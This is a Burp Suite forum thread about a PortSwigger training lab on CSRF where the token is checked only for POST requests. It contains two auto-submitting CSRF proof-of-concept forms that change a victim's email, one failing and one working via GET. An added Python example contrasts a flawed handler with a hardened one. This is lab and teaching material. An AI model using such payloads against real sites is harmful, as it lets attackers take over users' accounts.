Burp Suite User Forum


solved the lab and not appearing as solved

Malek | Last updated: Oct 01, 2024 06:16PM UTC

I tried everything and it is not working. I even tried Chrome and Firefox; both are not working.

LAB: CSRF where token validation depends on request method

My code:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="https://0ae700ed035a4ad680378079006900c1.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="Hacker@gmail.com" />
          <input type="hidden" name="csrf" value="2PsbBOK7XVqG8kxGucPmtoPSqpd8bZP8" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 10:20AM UTC

Hi Malek,

You do not appear to have changed the POST request to a GET request and then used the CSRF PoC functionality.

For what it is worth, the following payload allows me to solve this lab:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="https://0a36000604cbe09885b0273600be00ce.web-security-academy.net/my-account/change-email">
          <input type="hidden" name="email" value="test7&#64;hotmail&#46;com" />
          <input type="hidden" name="csrf" value="TwNYVxiqyaeoGDCnbU2EXNBGw3XMUTw6" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
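The server-side condition named in the lab title, next to a hardened handler, as an added example that is not part of this thread or of PortSwigger's lab code. The handler names, status codes, session store and token values are constructed assumptions.

```python
import hmac

def new_store():
    # Constructed sample session; the token and addresses are made up.
    return {"sess-1": {"csrf": "constructed-token", "email": "old@example.test"}}

def token_ok(session, params):
    # Constant-time comparison of the supplied token with the session's token.
    supplied = params.get("csrf", "")
    return hmac.compare_digest(supplied.encode(), session["csrf"].encode())

def change_email_flawed(store, method, session_id, params):
    """Validates the token only when the method is POST."""
    session = store.get(session_id)
    if session is None:
        return 401
    if "email" not in params:
        return 400
    if method == "POST" and not token_ok(session, params):
        return 403
    # Any other method reaches the state change with no token check at all.
    session["email"] = params["email"]
    return 302

def change_email_hardened(store, method, session_id, params):
    """Accepts the state change on POST only, and always validates the token."""
    session = store.get(session_id)
    if session is None:
        return 401
    if method != "POST":
        return 405  # the state-changing route does not answer GET
    if "email" not in params:
        return 400
    if not token_ok(session, params):
        return 403
    session["email"] = params["email"]
    return 302

if __name__ == "__main__":
    bad = {"email": "new@example.test", "csrf": "wrong"}
    for handler in (change_email_flawed, change_email_hardened):
        for method in ("POST", "GET"):
            store = new_store()
            status = handler(store, method, "sess-1", bad)
            print(handler.__name__, method, status, store["sess-1"]["email"])
```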
